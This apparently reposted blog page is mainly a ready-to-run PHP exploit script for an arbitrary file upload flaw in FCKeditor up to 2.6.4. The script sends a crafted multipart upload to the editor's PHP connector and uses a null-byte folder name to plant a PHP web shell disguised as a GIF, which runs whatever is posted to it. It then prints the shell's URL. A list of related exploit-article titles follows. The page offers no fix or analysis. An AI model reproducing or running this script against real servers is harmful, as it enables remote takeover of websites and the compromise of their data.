fckeditor <= 2.6.4 任意文件上传漏洞
来源:互联网 发布:java线程池的正确使用 编辑:程序博客网 时间:2024/06/05 18:10
<?
error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80);while (!$sock){print "\n[-] No response from {$host}:80 Trying again...";$sock = fsockopen($host, 80);}fputs($sock, $packet);while (!feof($sock)) $resp .= fread($sock, 1024);fclose($sock);print $resp;return $resp;}function connector_response($html){global $match;return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));}print "\n+------------------------------------------------------------------+";print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";print "\n+------------------------------------------------------------------+\n";if ($argc < 3){print "\nUsage......: php $argv[0] host path\n";print "\nExample....: php $argv[0] localhost /\n";print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();}$host = $argv[1];$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";$foldername = "fuck.php%00.gif";$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";$payload .= "Content-Type: image/jpeg\r\n\r\n";$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;$packet .= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";$packet .= "Content-Length: ".strlen($payload)."\r\n";$packet .= "Connection: close\r\n\r\n";$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");else print "\n[-] Job done! try http://${host}/$match[2] \n";?>http://www.wooyun.org/bugs/wooyun-2010-01684
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor任意文件上传漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- FCKeditor connector.php任意文件上传漏洞
- Fckeditor 2.4.2 php任意上传文件漏洞
- Fckeditor 2.4.2 php任意上传文件漏洞+修补方法
- Fckeditor <= 2.4.2 的任意文件上传漏洞代码解析
- fckeditor文件上传漏洞(.NET)
- PHP任意文件上传漏洞
- fckeditor - (4)文件上传
- F2blog XMLRPC 上传任意文件漏洞
- PHPCMS最新版任意文件上传漏洞分析
- FCKeditor上传漏洞总结
- FCKeditor编辑器上传漏洞
- 只有在民营互联网公司技术才是最重要的!
- Linus Torvalds’s Lessons on Software Development Management
- Samsung smart tv俄罗斯方块应用
- 关于gcc的警告:warning: useless keyword or type name in empty declaration
- Vista&Win7下CreateRemoteThread应用的若干问题和解决方案
- fckeditor <= 2.6.4 任意文件上传漏洞
- Yii Framework添加Srbac模块的步骤
- 翻转句子中单词的顺序
- poj1191 棋盘分割(记忆化搜索)
- ASP.NET页面事件:顺序与回传详解
- Yii Framework中截取字符串(UTF-8)的方法
- Yii Framework隐藏index.php文件的步骤
- 2011-9-27 21:43:19
- lambda控制结构